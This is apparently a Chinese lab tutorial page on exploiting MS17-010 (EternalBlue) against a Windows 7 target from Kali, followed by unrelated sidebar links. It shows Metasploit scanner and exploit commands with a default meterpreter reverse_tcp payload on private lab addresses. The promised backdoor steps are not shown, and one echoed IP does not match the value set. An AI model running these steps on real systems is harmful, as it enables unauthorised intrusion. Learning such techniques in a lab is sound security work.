当前位置:网站首页>使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透及建立永久后门
使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透及建立永久后门
2022-06-12 06:19:00 【Cwillchris】
实验环境:
kali攻击机(192.168.98.30)
win7目标机(192.168.98.35)
实验步骤:
1、 先对目标主机进行扫描确认是否存在漏洞
msfdb run
sf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.98.35
rhosts => 192.168.98.35
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

目标机存在 MS17-010 漏洞
2、开始漏洞利用
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
sf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.98.35
rhosts => 192.168.98.3
边栏推荐
- Introduction to the method of diligently searching for the alliance procedure
- Multithreading (4) -- no lock (2) -- Atomic related atomic classes
- Why don't databases use hash tables?
- Leetcode-139. Word splitting
- LeetCode-剑指Offer(第二版)个人题解完整版
- 线程有哪些状态?
- 关于 Sensor flicker/banding现象的解释
- (UE4 4.27) customize primitivecomponent
- Word vector training based on nnlm
- Guns framework multi data source configuration without modifying the configuration file
猜你喜欢

Multithreading (4) -- no lock (3) -- longadder source code

MNIST handwritten data recognition by CNN

Leetcode January 12 daily question 334 Increasing ternary subsequence

Sqlite Cross - compile Dynamic Library

C2w model - language model

Computer composition and design work06 —— 基于MIPS

What states do threads have?

Unity implements smooth interpolation

Piecewise Bezier curve

leetcode 704. Binary search
随机推荐
How do I get the date and time from the Internet- How to get DateTime from the internet?
zip 和.items()区别
Dlib face detection
哈工大信息内容安全实验
Textcnn (MR dataset - emotion classification)
LeetCode个人题解(剑指offer3-5)3.数组中重复的数字,4.二维数组中的查找,5.替换空格
468. verifying the IP address
Trunet: short videos generation from long videos via story preserving truncation (thesis translation)
Redis data structure (VIII) -- Geo
Leetcode sword finger offer (Second Edition) complete version of personal questions
关于 Sensor flicker/banding现象的解释
Unity3d multi platform method for reading text files in streamingasset directory
Redis data type (VII) -- hyperloglog
Android studio mobile development creates a new database and obtains picture and text data from the database to display on the listview list
Explanation of sensor flicker/banding phenomenon
CONDA create use virtual environment
Computer composition and design work06 —— 基于MIPS
The vs 2019 community version Microsoft account cannot be logged in and activated offline
Leetcode January 13 daily question 747 At least twice the maximum number of other numbers
(UE4 4.27) add globalshder to the plug-in